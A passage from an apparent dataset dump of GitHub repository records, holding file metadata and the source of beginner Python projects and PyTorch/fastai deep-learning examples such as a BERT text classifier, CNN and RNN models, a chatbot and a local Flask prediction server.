lz[i,j]=innerprod(phiall[i],xop(py(phiall[j]))-yop(px(phiall[j])));\n lx[i,j]=innerprod(phiall[i],yop(pz(phiall[j]))-zop(py(phiall[j])));\n ly[i,j]=innerprod(phiall[i],zop(px(phiall[j]))-xop(pz(phiall[j])));\ndata_file=open(\"re.txt\",\"a\");\ndata_file.write(lx);\ndata_file.write(\"\\n\");\ndata_file.write(ly);\ndata_file.write(\"\\n\");\ndata_file.write(lz);\ndata_file.close();\n" } ]
2
vedant-kakde/Py-Projects
https://github.com/vedant-kakde/Py-Projects
54537158fed196f83e0fc343474c3548f117f33c
9abda3511228d564fe21e6f749f094fa279344e5
1a9f783a5a7789aa7d0ab2d398fdf3d80329b6bf
refs/heads/main
2023-07-02T02:51:00.211441
2021-07-24T17:09:18
2021-07-24T17:09:18
386,736,545
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7006109952926636, "alphanum_fraction": 0.7087576389312744, "avg_line_length": 17.923076629638672, "blob_id": "04c8c9881e914298ba8ad3675a94c25e0afe48dd", "content_id": "762b7e5b5f9347387f2a6693a0f028ea7ce9b520", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 491, "license_type": "no_license", "max_line_length": 79, "num_lines": 26, "path": "/1-word counter/word-counter.py", "repo_name": "vedant-kakde/Py-Projects", "src_encoding": "UTF-8", "text": "# WORD COUNTER\n\n# We want a program which can count the words from each text file automatically\n\n# First we need a sample text file\n!wget https://filesamples.com/samples/document/txt/sample1.txt\n\n# Opening a file using read mode\nf = open(\"/content/sample1.txt\", \"r\")\n\n# Empty List\nc=[]\n\n# Splitting all the words inside the text file and appending it to the list\nfor x in f:\n print(x)\n c.append(x.split(' '))\nc\n\n# Count of words inside the list c\nd=0\nfor i in range(len(c)):\n d=d+1\nd\n\nlen(c)" }, { "alpha_fraction": 0.7115384340286255, "alphanum_fraction": 0.75, "avg_line_length": 16.33333396911621, "blob_id": "d2eb8ea90b549d50ba8470c9d5cc31b151f6c774", "content_id": "8c7126507898d5c657859fb57992175d9ac744ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 21, "num_lines": 3, "path": "/README.md", "repo_name": "vedant-kakde/Py-Projects", "src_encoding": "UTF-8", "text": "# Py-Projects\n1. Word counter\n2. Word Guessing Game\n" }, { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.6645962595939636, "avg_line_length": 20.078947067260742, "blob_id": "4d436bb647e0dc37cbc4232d962a7010799f49c6", "content_id": "51d05833e242527ca63b1f6a622c3c5131b11140", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 805, "license_type": "no_license", "max_line_length": 71, "num_lines": 38, "path": "/2-word guessing game/word-guessing-game.py", "repo_name": "vedant-kakde/Py-Projects", "src_encoding": "UTF-8", "text": "import random\n\nwords=['facebook', 'amazon', 'apple', 'microsoft', 'netflix', 'google']\n\n#choose random words from the list\nguessed_word = random.choice(words)\nguessed_word\n\nhint=guessed_word[0]+guessed_word[-1]\nhint\n\nstore_g_l=[]\ntry_p=6\na=input('Enter Your Name')\nprint('Welcome to the Game world', a)\nprint('You have 6 attempts to guess the word.')\n\nfor guess in range(try_p):\n while True:\n letter = input('Guess the letter')\n\n if len(letter) == 1:\n break\n else:\n print(\"Oops! Please guess a letter\")\n\n if letter in guessed_word:\n print('yes!')\n store_g_l.append(letter)\n else:\n print('no!')\n\n if guess == 3:\n print()\n clue_request = input('Would you like a clue?')\n if clue_request.lower().startswith('y'):\n print()\n print('CLUE: The first and last letter of the word is: ', hint)\n \n" } ]
3
Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist
https://github.com/Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist
b050c57e1f8dbd748a2abd5eb242777242f593cc
b4b264e0fc89154ce02a6db5031ec1c83c27d026
84d27639c4ec73a7c78e2a5c7f65f482515f2883
refs/heads/master
2023-05-29T11:22:35.362279
2019-08-26T04:07:33
2019-08-26T04:07:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6636260151863098, "alphanum_fraction": 0.6870011687278748, "avg_line_length": 42.875, "blob_id": "57c548ac867c5f29c29fe10914db9df7793e6ad9", "content_id": "d3ec31a6a0d72e9a8d064426d3a5a00cd36c6d65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1754, "license_type": "no_license", "max_line_length": 112, "num_lines": 40, "path": "/chapter7/transformer-xl.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "### First, tokenize the input\n#############################\nimport torch\ntokenizer = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'transformerXLTokenizer', 'transfo-xl-wt103')\n\n# Prepare tokenized input\ntext_1 = \"Who was Jim Henson ?\"\ntext_2 = \"Jim Henson was a puppeteer\"\ntokenized_text_1 = tokenizer.tokenize(text_1)\ntokenized_text_2 = tokenizer.tokenize(text_2)\nindexed_tokens_1 = tokenizer.convert_tokens_to_ids(tokenized_text_1)\nindexed_tokens_2 = tokenizer.convert_tokens_to_ids(tokenized_text_2)\ntokens_tensor_1 = torch.tensor([indexed_tokens_1])\ntokens_tensor_2 = torch.tensor([indexed_tokens_2])\n\n### Get the hidden states computed by `transformerXLModel`\n##########################################################\nmodel = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'transformerXLModel', 'transfo-xl-wt103')\nmodel.eval()\n\n# Predict hidden states features for each layer\n# past can be used to reuse precomputed hidden state in a subsequent predictions\nwith torch.no_grad():\n hidden_states_1, mems_1 = model(tokens_tensor_1)\n hidden_states_2, mems_2 = model(tokens_tensor_2, mems=mems_1)\n\n### Predict the next token using `transformerXLLMHeadModel`\n###########################################################\nlm_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'transformerXLLMHeadModel', 'transfo-xl-wt103')\nlm_model.eval()\n\n# Predict hidden states features for each layer\nwith torch.no_grad():\n predictions_1, mems_1 = lm_model(tokens_tensor_1)\n predictions_2, mems_2 = lm_model(tokens_tensor_2, mems=mems_1)\n\n# Get the predicted last token\npredicted_index = torch.argmax(predictions_2[0, -1, :]).item()\npredicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]\nassert predicted_token == 'who'" }, { "alpha_fraction": 0.6356225609779358, "alphanum_fraction": 0.6464234590530396, "avg_line_length": 31.039215087890625, "blob_id": "8ed35d774aafb70f890412b9eea62868de2f91bf", "content_id": "f036559f2276081a815b0ed97b3f5918f5d580e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5537, "license_type": "no_license", "max_line_length": 106, "num_lines": 153, "path": "/chapter9/fastai_bert_classification.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom typing import *\nimport torch\nimport torch.optim as optim\nfrom fastai import *\nfrom fastai.vision import *\nfrom fastai.text import *\nfrom fastai.callbacks import *\nimport torchsnooper\n\n\n\n\nclass Config(dict):\n \"\"\"\n 定义Config类,便于参数配置与更改\n 继承自dict字典\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n for k, v in kwargs.items():\n setattr(self, k, v)\n def set(self, key, val):\n self[key] = val\n setattr(self, key, val)\n \nconfig = Config(\n testing = False,\n bert_model_name=\"bert-base-chinese\", \n #Chinese Simplified and Traditional, 12-layer, 768-hidden, 12-heads, 110M parameters\n max_lr=3e-5,#学习率\n epochs=5,\n use_fp16=False, #fastai里可以方便地调整精度,加快训练速度:learner.to_fp16()\n bs=8,#batch size\n max_seq_len=128, #选取合适的seq_length,较大的值可能导致训练极慢报错等\n)\n\nfrom pytorch_pretrained_bert import BertTokenizer\nbert_tokenizer = BertTokenizer.from_pretrained(\"bert-base-chinese\")\n\n#使用Bert分词器分词的适配器\nclass FastAiBertTokenizerAdapter(BaseTokenizer):\n \"\"\"包装BertTokenizer为FastAI中的BaseTokenizer\"\"\"\n def __init__(self, tokenizer: BertTokenizer, max_seq_len: int=128, **kwargs):\n self._pretrained_tokenizer = tokenizer\n self.max_seq_len = max_seq_len\n def __call__(self, *args, **kwargs):\n return self\n def tokenizer(self, t:str) -> List[str]:\n \"\"\"限制最大序列长度,使用Bert中的分词器将传入的序列进行分词,并在首位分别加上[CLS][SEP]标记\"\"\"\n return [\"[CLS]\"] + self._pretrained_tokenizer.tokenize(t)[:self.max_seq_len - 2] + [\"[SEP]\"]\n\n#创建FastAI分词器实例,由分词器和规则组成,默认为SpacyTokenizer,SpacyTokenizer只支持英文,因此无法用于处理中文\nfastai_tokenizer = Tokenizer(\n tok_func=FastAiBertTokenizerAdapter(bert_tokenizer, max_seq_len=config.max_seq_len), \n pre_rules=[], \n post_rules=[]\n)\n\n#设置FastAI Vocab\nfastai_vocab = Vocab(list(bert_tokenizer.vocab.keys()))\n\nimport pandas as pd\ndf_train = pd.read_csv(\"./datas/train.csv\",encoding='utf-8')\ndf_test = pd.read_csv(\"./datas/test.csv\",encoding='utf-8')\n#标签涵义:1代表正向评论,0代表负向评论\nlabel_denotation = {1:'pos',0:'neg'}\ndf_train['label'] = df_train[\"label\"].map(lambda x:0 if x=='neg' else 1)\nfrom sklearn.model_selection import train_test_split\n\ndf_train, df_val = train_test_split(df_train,test_size=0.2,random_state=10)\n\ndf_test['label'] = df_test[\"label\"].map(lambda x:0 if x=='neg' else 1)\n\n\ndef get_databunch():\n #建立TextDataBunch \n databunch = TextClasDataBunch.from_df(\".\", df_train, df_val,df_test,\n tokenizer=fastai_tokenizer,\n vocab=fastai_vocab,\n include_bos=False,\n include_eos=False,\n text_cols=\"sentence\",\n label_cols='label',\n bs=config.bs,\n collate_fn=partial(pad_collate, pad_first=False, pad_idx=0),\n pin_memory=True,\n num_workers = 1,\n device=torch.device(\"cpu\")\n ) \n return databunch\n\ndef get_model():\n #model\n from pytorch_pretrained_bert.modeling import BertConfig, BertForSequenceClassification\n bert_model = BertForSequenceClassification.from_pretrained(config.bert_model_name, num_labels=2).cpu()\n return bert_model\n\n\ndef get_loss_fun():\n #损失函数:二分类问题选用CrossEntrypyLoss作为损失函数\n loss_func = nn.CrossEntropyLoss()\n return loss_func\n \ndef get_metrics():\n return [accuracy,AUROC(),error_rate]\n\ndef get_learner():\n databunch = get_databunch()\n bert_model = get_model()\n loss_func = get_loss_fun()\n #建立Learner(数据,预训练模型,损失函数)\n learner = Learner(databunch, bert_model,loss_func=loss_func,metrics=get_metrics())\n return learner\n\ndef train():\n learner = get_learner()\n #尝试寻找合适的最大学习率,这里使用了BERT原论文推荐的学习率3e-5作为默认值\n #learner.lr_find()\n #learner.recorder.plot(skip_end=20)\n #开始训练\n learner.fit_one_cycle(config.epochs, max_lr=config.max_lr)\n #模型保存\n learner.save('./fastai_bert_chinese_classification') \n\ndef predict_learner():\n learner = get_learner()\n learner.load(\"./fastai_bert_chinese_classification\")\n return learner\n \n\nif __name__ == \"__main__\":\n #建立Learner(数据,预训练模型,损失函数)\n learner = get_learner()\n learner.load(\"./fastai_bert_chinese_classification\") \n #用样例测试下\n result = learner.predict(\"房间稍小,交通不便,专车往返酒店与浦东机场,车程10分钟,但是经常满员,不得不站在车里\")\n print(\"predict result:{}\".format(result))\n #在整个测试集上进行测试\n #tf_test_sentences = df_test[\"sentence\"].values\n #df_test_labels = df_test[\"label\"].values\n #import numpy as np\n #predict_labels = []\n #for sentence in tf_test_sentences:\n # result = learner.predict(sentence)\n # label = result[1].item()\n # predict_labels.append(label)\n #correct = np.sum(df_test_labels==np.array(predict_labels))\n #acc = correct / df_test_labels.size\n #print(\"accuracy:{}\".format(acc))\n #accuracy:0.926\n \n" }, { "alpha_fraction": 0.4929797053337097, "alphanum_fraction": 0.5546022057533264, "avg_line_length": 33.64864730834961, "blob_id": "8418d95f6789c443f5c3577ea8a503c0c711bef1", "content_id": "57e68a7a2bdba4a9b5e154afa22217947fea917e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1282, "license_type": "no_license", "max_line_length": 67, "num_lines": 37, "path": "/chapter4/CNN/model.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass CNN_Net(nn.Module):\n def __init__(self):\n super(CNN_Net,self).__init__()\n self.conv1 = nn.Conv2d(1, 8, kernel_size=7)\n self.conv2 = nn.Conv2d(8, 32, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(288, 100)\n self.fc2 = nn.Linear(100, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 288)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n return F.log_softmax(x, dim=1)\n \n \nclass CNN_Dilation_Net(nn.Module):\n def __init__(self):\n super(CNN_Dilation_Net,self).__init__()\n self.conv1 = nn.Conv2d(1, 8, kernel_size=7,dilation=2)\n self.conv2 = nn.Conv2d(8, 32, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(128, 50)\n self.fc2 = nn.Linear(50, 10)\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 128)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n return F.log_softmax(x, dim=1)\n" }, { "alpha_fraction": 0.5835475325584412, "alphanum_fraction": 0.5938303470611572, "avg_line_length": 25.272727966308594, "blob_id": "0a93b2b0e5fb8cb8e34ea7c75452cd5821b55a5a", "content_id": "3f84a4951073bf31db835c6ad4154243cf9b8cb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1217, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/chapter3/multiprocess/多进程训练模型.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport torch.multiprocessing as mp\nimport torch\nimport random \nfrom train import train\n\nclass LinearRegression(torch.nn.Module):\n def __init__(self):\n super(LinearRegression,self).__init__()\n #输入输出都是一维\n self.linear = torch.nn.Linear(1,1)\n def forward(self,x):\n return self.linear(x)\n\n\nif __name__ == \"__main__\":\n mp.set_start_method('spawn')\n x = np.arange(20)\n y = np.array([5*x[i]+random.randint(1,20) for i in range(len(x))])\n x_train = torch.from_numpy(x).float()\n y_train = torch.from_numpy(y).float() \n \n #新建模型,误差函数,优化器\n model = LinearRegression()\n model.share_memory()\n \n processes = []\n for rank in range(10):\n p = mp.Process(target=train, args=(x_train,y_train,model))\n p.start()\n processes.append(p)\n for p in processes:\n p.join() \n \n #预测一波 \n input_data = x_train.unsqueeze(1)\n predict = model(input_data)\n plt.xlabel(\"X\")\n plt.ylabel(\"Y\") \n plt.plot(x_train.data.numpy(),predict.squeeze(1).data.numpy(),\"r\")\n plt.scatter(x_train,y_train)\n \n plt.show()\n \n \n\n\n" }, { "alpha_fraction": 0.6095317602157593, "alphanum_fraction": 0.6145485043525696, "avg_line_length": 24.46808433532715, "blob_id": "50aa8dc5fdfd7f5be3635941f469a578d339ee8c", "content_id": "53e52c6a4ae5eeb9d5fab6b1b088491e89e6f7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1338, "license_type": "no_license", "max_line_length": 62, "num_lines": 47, "path": "/chapter10/PBG/data_split.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import os\nimport random\n\n\nDATA_PATH = \"datas/soc-LiveJournal/soc-LiveJournal-sample.txt\"\nFILENAMES = {\n 'train': 'train.txt',\n 'test': 'test.txt',\n}\nTRAIN_FRACTION = 0.8\nTEST_FRACTION = 0.2\n\ndef random_split_file(fpath):\n root = os.path.dirname(fpath)\n\n output_paths = [\n os.path.join(root, FILENAMES['train']),\n os.path.join(root, FILENAMES['test']),\n ]\n if all(os.path.exists(path) for path in output_paths):\n print(\"训练及测试文件已经存在,不再生成测试训练文件...\")\n return\n\n #读取数据,并随机打乱,划分出训练数据集测试数据\n train_file = os.path.join(root, FILENAMES['train'])\n test_file = os.path.join(root, FILENAMES['test'])\n #读取数据\n with open(fpath, \"rt\") as in_tf:\n lines = in_tf.readlines()\n\n #调过soc-LiveJournal.txt文件头部的4行注解\n lines = lines[4:]\n #shuffle打乱数据\n random.shuffle(lines)\n split_len = int(len(lines) * TRAIN_FRACTION)\n #写入测试及训练文件\n with open(train_file, \"wt\") as out_tf_train:\n for line in lines[:split_len]:\n out_tf_train.write(line)\n\n with open(test_file, \"wt\") as out_tf_test:\n for line in lines[split_len:]:\n out_tf_test.write(line)\n\n\nif __name__==\"__main__\":\n random_split_file(DATA_PATH)" }, { "alpha_fraction": 0.7105262875556946, "alphanum_fraction": 0.7631579041481018, "avg_line_length": 33.20000076293945, "blob_id": "34fbfb137478c3173fbc9ed10ba43130e27353a4", "content_id": "5f2f23a19b69e3f73c19de68e5617291a43df1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 86, "num_lines": 10, "path": "/chapter6/word2vec.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import gensim\nfrom gensim.models import Word2Vec\nfrom gensim.models.word2vec import LineSentence\nnews = open('./datas/Corpus_utf8.txt', 'r',encoding='utf8')\nmodel = Word2Vec(LineSentence(news), sg=0,size=200, window=5, min_count=5, workers=12)\nmodel.save(\"news.word2vec\")\n\nmodel = gensim.models.KeyedVectors.load(\"news.word2vec\")\n\nprint(123)\n" }, { "alpha_fraction": 0.6433432698249817, "alphanum_fraction": 0.6475967764854431, "avg_line_length": 44.65048599243164, "blob_id": "ffc8c920c63c367d6a3c68e669ac941de2dce8ae", "content_id": "ccbdb781d69899a7598924a100f970ef016481d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4862, "license_type": "no_license", "max_line_length": 136, "num_lines": 103, "path": "/chapter6/robot/model.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence,pad_packed_sequence\n\nclass EncoderRNN(nn.Module):\n def __init__(self, opts, voc_length):\n super(EncoderRNN, self).__init__()\n self.num_layers = opts.num_layers\n self.hidden_size = opts.hidden_size\n self.embedding = nn.Embedding(voc_length, opts.embedding_dim)\n #双向GRU作为Encoder\n self.gru = nn.GRU(opts.embedding_dim, self.hidden_size, self.num_layers,dropout= opts.dropout, bidirectional=opts.bidirectional)\n def forward(self, input_seq, input_lengths, hidden=None):\n \"\"\"\n input_seq:[max_seq_length,batch_size]\n input_lengths:the lengths in batchs\n \"\"\"\n embedded = self.embedding(input_seq) \n #packed data shape:[all_words_size_in_batch,embedding_size]\n packed = pack_padded_sequence(embedded, input_lengths)\n #outputs data shape:[all_words_size_in_batch,num_layer*hidden_size] \n #hidden shape:[num_layer*bidirection,batch_size,hidden_size]\n outputs, hidden = self.gru(packed, hidden)\n #outputs shape:[max_seq_length,batch_size,num_layer*hidden_size]\n outputs, _ = pad_packed_sequence(outputs)\n #将双向的outputs求和\n outputs = outputs[:, :, :self.hidden_size] + outputs[:, : ,self.hidden_size:]\n return outputs, hidden\n\n\nclass Attention(torch.nn.Module):\n def __init__(self, attn_method, hidden_size):\n super(Attention, self).__init__()\n #Attention的方式:dot和general\n self.method = attn_method \n self.hidden_size = hidden_size\n if self.method not in ['dot', 'general']:\n raise ValueError(self.method, \"is not an appropriate attention method.\")\n if self.method == 'general':\n self.attn = torch.nn.Linear(self.hidden_size, self.hidden_size)\n #dot方式\n def dot_score(self, hidden, encoder_outputs):\n \"\"\"\n hidden shape:[1,batch_size,hidden_size]\n encoder_outputs shape:[max_seq_length,batch_size,hidden_size]\n result shape:[max_seq_length,batch_size]\n \"\"\"\n return torch.sum(hidden * encoder_outputs, dim=2)\n #general方式\n def general_score(self, hidden, encoder_outputs):\n energy = self.attn(encoder_outputs)\n return torch.sum(hidden * energy, dim=2)\n #前向传播\n def forward(self, hidden, encoder_outputs):\n if self.method == 'general':\n attn_energies = self.general_score(hidden, encoder_outputs)\n elif self.method == 'dot':\n attn_energies = self.dot_score(hidden, encoder_outputs)\n attn_energies = attn_energies.t()#[batch_size,max_seq_length]\n return F.softmax(attn_energies, dim=1).unsqueeze(1)#[batch_size,1,max_seq_length]\n\nclass AttentionDecoderRNN(nn.Module):\n def __init__(self, opts, voc_length):\n super(AttentionDecoderRNN, self).__init__()\n self.attn_method = opts.method\n self.hidden_size = opts.hidden_size\n self.output_size = voc_length\n self.num_layers = opts.num_layers\n self.dropout = opts.dropout\n self.embedding = nn.Embedding(voc_length, opts.embedding_dim)\n self.embedding_dropout = nn.Dropout(self.dropout)\n self.gru=nn.GRU(opts.embedding_dim,self.hidden_size,self.num_layers, dropout = self.dropout )\n self.concat = nn.Linear(self.hidden_size * 2, self.hidden_size)\n self.out = nn.Linear(self.hidden_size, self.output_size)\n self.attention = Attention(self.attn_method, self.hidden_size)\n\n def forward(self, input_step, last_hidden, encoder_outputs):\n \"\"\"\n input_step shape:[1,batch_size]\n embedded shape:[1,batch_size,embedding_size]\n \n \"\"\"\n embedded = self.embedding(input_step) \n embedded = self.embedding_dropout(embedded)\n #rnn_output shape:[1,batch_size,hidden_size]\n #hideen shape:[num_layer*bidirection,batch_size,hidden_size]\n rnn_output, hidden = self.gru(embedded, last_hidden)\n #注意力权重#[batch_size,1,max_seq_length]\n attn_weights = self.attention(rnn_output, encoder_outputs)\n #由注意力权重通过bmm批量矩阵相乘计算出此时rnn_output对应的注意力Context\n #context shape:[batch_size,1,hidden_size]\n context = attn_weights.bmm(encoder_outputs.transpose(0, 1))\n rnn_output = rnn_output.squeeze(0)\n context = context.squeeze(1)\n #上下文和rnn_out拼接\n concat_input = torch.cat((rnn_output, context), 1)\n #使用tanh非线性函数将值范围变成[-1,1]\n concat_output = torch.tanh(self.concat(concat_input)) \n output = self.out(concat_output)\n #Softmax函数计算output的得分值\n output = F.softmax(output, dim=1)\n return output, hidden\n" }, { "alpha_fraction": 0.6492776870727539, "alphanum_fraction": 0.675762414932251, "avg_line_length": 30.125, "blob_id": "14054069e2daf9551c937529dec6b70ae1b4d375", "content_id": "92e439f00d7c86a617cdcf3cc84a0e0e0623958b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1374, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/chapter5/RNN/RNNCell.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nclass RNNCell(nn.Module):\n def __init__(self, input_size, hidden_size, output_size,batch_size):\n super(RNNCell, self).__init__()\n self.batch_size = batch_size\n self.hidden_size = hidden_size\n self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n self.i2o = nn.Linear(input_size + hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden):\n combined = torch.cat((input, hidden), 1)\n hidden = self.i2h(combined)\n output = self.i2o(combined)\n output = self.softmax(output)\n return output, hidden\n \n def initHidden(self):\n return torch.zeros(self.batch_size, self.hidden_size)\n \n#隐藏层神经元个数\nn_hidden = 10\n#分类类别数\ntarget_size = 2\n#输入长度,以字符英文字符为例,英文字符个数为26\ninput_size=26\n#batch_size\nbatch_size=64\n#实例化RNN\nrnnCell = RNNCell(input_size, n_hidden, target_size,batch_size)\n#初始化隐藏状态,初始为0\nhidden = rnnCell.initHidden()\n#构造输入,随机生成0到10,形状为[64,26]\ninput = torch.randint(0,10,(batch_size,input_size)).float()\nprint(input)\nprint(input.shape)\noutput, next_hidden = rnnCell(input, hidden)#得到[20*2,20*10]\nprint(output.data.size(),next_hidden.data.size())\n\n" }, { "alpha_fraction": 0.617977499961853, "alphanum_fraction": 0.6266205906867981, "avg_line_length": 37.56666564941406, "blob_id": "2af160cd7636ea725bd1357d0a6c5181c1ec85a8", "content_id": "acf2294d97075ee01657f219e34591b149db27fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 144, "num_lines": 30, "path": "/chapter9/server.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import flask\nfrom gevent import pywsgi\nimport json\nfrom fastai_bert_classification import predict_learner\nfrom flask import Flask,request,render_template\n#实例化出server对象\nserver=flask.Flask(__name__) \ndef response_wrapper(keep_dict = False,**kargs):\n \"\"\"\n 将字典类型包装成json\n params: keep_dict: Whether or not keep dict type\n \"\"\"\n return kargs if(keep_dict) else json.dumps(kargs,ensure_ascii=False)\n\nif __name__ == \"__main__\":\n learner = predict_learner()\n @server.route('/fastai_bert_classification/predict',methods=['post','get'])\n def preview_file_():\n try:\n if request.method == 'GET':\n return render_template('input.html')\n else: \n message = flask.request.values.get('message') \n result = learner.predict(message)\n return response_wrapper(category_label=result[1].item(),neg_probability=result[2][0].item(),pos_probability=result[2][1].item())\n except Exception as e:\n print(e)\n return e.args[0].__str__()\n wsgi_server = pywsgi.WSGIServer((\"localhost\", 1314), server)\n wsgi_server.serve_forever() " }, { "alpha_fraction": 0.5975469350814819, "alphanum_fraction": 0.6025297045707703, "avg_line_length": 33.733333587646484, "blob_id": "763617444753c95dd71329ec26037fd227eaf9a2", "content_id": "e16dca752d5badc01f8d826bee10ff8498952e5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2667, "license_type": "no_license", "max_line_length": 88, "num_lines": 75, "path": "/chapter6/robot/loader.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport itertools\nfrom torch.utils.data import DataLoader,Dataset\nfrom torch.nn import functional as F\n\n\ndef create_collate_fn(padding, eos):\n def collate_fn(corpus_item):\n #按照inputQue的长度进行排序,是调用pad_packed_sequence方法的要求\n corpus_item.sort(key=lambda p: len(p[0]), reverse=True) \n inputs, targets, indexes = zip(*corpus_item)\n input_lengths = torch.tensor([len(line) for line in inputs])\n inputs = zeroPadding(inputs, padding)\n #词嵌入需要使用Long类型的Tensor\n inputs = torch.LongTensor(inputs)\n max_target_length = max([len(line) for line in targets])\n targets = zeroPadding(targets, padding)\n mask = binaryMatrix(targets, padding)\n mask = torch.ByteTensor(mask)\n targets = torch.LongTensor(targets)\n return inputs, targets, mask, input_lengths, max_target_length, indexes\n return collate_fn\n\ndef zeroPadding(datas, fillvalue):\n return list(itertools.zip_longest(*datas, fillvalue=fillvalue))\n\ndef binaryMatrix(datas, padding):\n m = []\n for i, seq in enumerate(datas):\n m.append([])\n for token in seq:\n if token == padding:\n m[i].append(0)\n else:\n m[i].append(1)\n return m\n\n\nclass CorpusDataset(Dataset):\n def __init__(self, opts):\n self.opts = opts\n self.datas = torch.load(opts.corpus_data_path)\n self.word2ix = self.datas['word2ix']\n self.ix2word = self.datas['ix2word']\n self.corpus = self.datas['corpus']\n self.padding = self.word2ix.get(self.datas.get('padding'))\n self.eos = self.word2ix.get(self.datas.get('eos'))\n self.sos = self.word2ix.get(self.datas.get('sos'))\n self.unknown = self.word2ix.get(self.datas.get('unknown'))\n def __getitem__(self, index):\n #问\n inputQue = self.corpus[index][0]\n #答\n targetAns = self.corpus[index][1]\n return inputQue,targetAns, index\n def __len__(self):\n return len(self.corpus)\n\ndef get_loader(opts):\n dataset = CorpusDataset(opts)\n dataloader = DataLoader( dataset,\n batch_size=opts.batch_size,\n shuffle=opts.shuffle,\n num_workers=opts.num_workers, \n drop_last=opts.drop_last,\n collate_fn=create_collate_fn(dataset.padding, dataset.eos),\n pin_memory=opts.pin_memory)\n return dataloader,dataset\n\n\n#dataloader,dataset = get_loader(opts)\n\n#for i in dataloader:\n# print(i)\n\n\n\n\n" }, { "alpha_fraction": 0.4535050094127655, "alphanum_fraction": 0.4721029996871948, "avg_line_length": 19.58823585510254, "blob_id": "112f9d869f73f2af811c0e9ca7122f08b80338a8", "content_id": "a3e6fd4bd5a58d735ee4a066b29e75ea683e54e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "no_license", "max_line_length": 45, "num_lines": 34, "path": "/chapter10/PBG/config.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "#实体节点路径\nentities_base = 'datas/soc-LiveJournal'\n#获取PBG的配置\ndef get_torchbiggraph_config():\n config = dict(\n #实体路径及模型检查点路径\n entity_path=entities_base,\n edge_paths=[],\n checkpoint_path='model/demo',\n #图结构及分区数\n entities={\n 'user_id': {'num_partitions': 2},\n },\n #关系类型及左右实体节点\n relations=[{\n 'name': 'follow',\n 'lhs': 'user_id',\n 'rhs': 'user_id',\n 'operator': 'none',\n }],\n\n #嵌入维度\n dimension=520,\n global_emb=False,\n\n #训练10个epoch\n 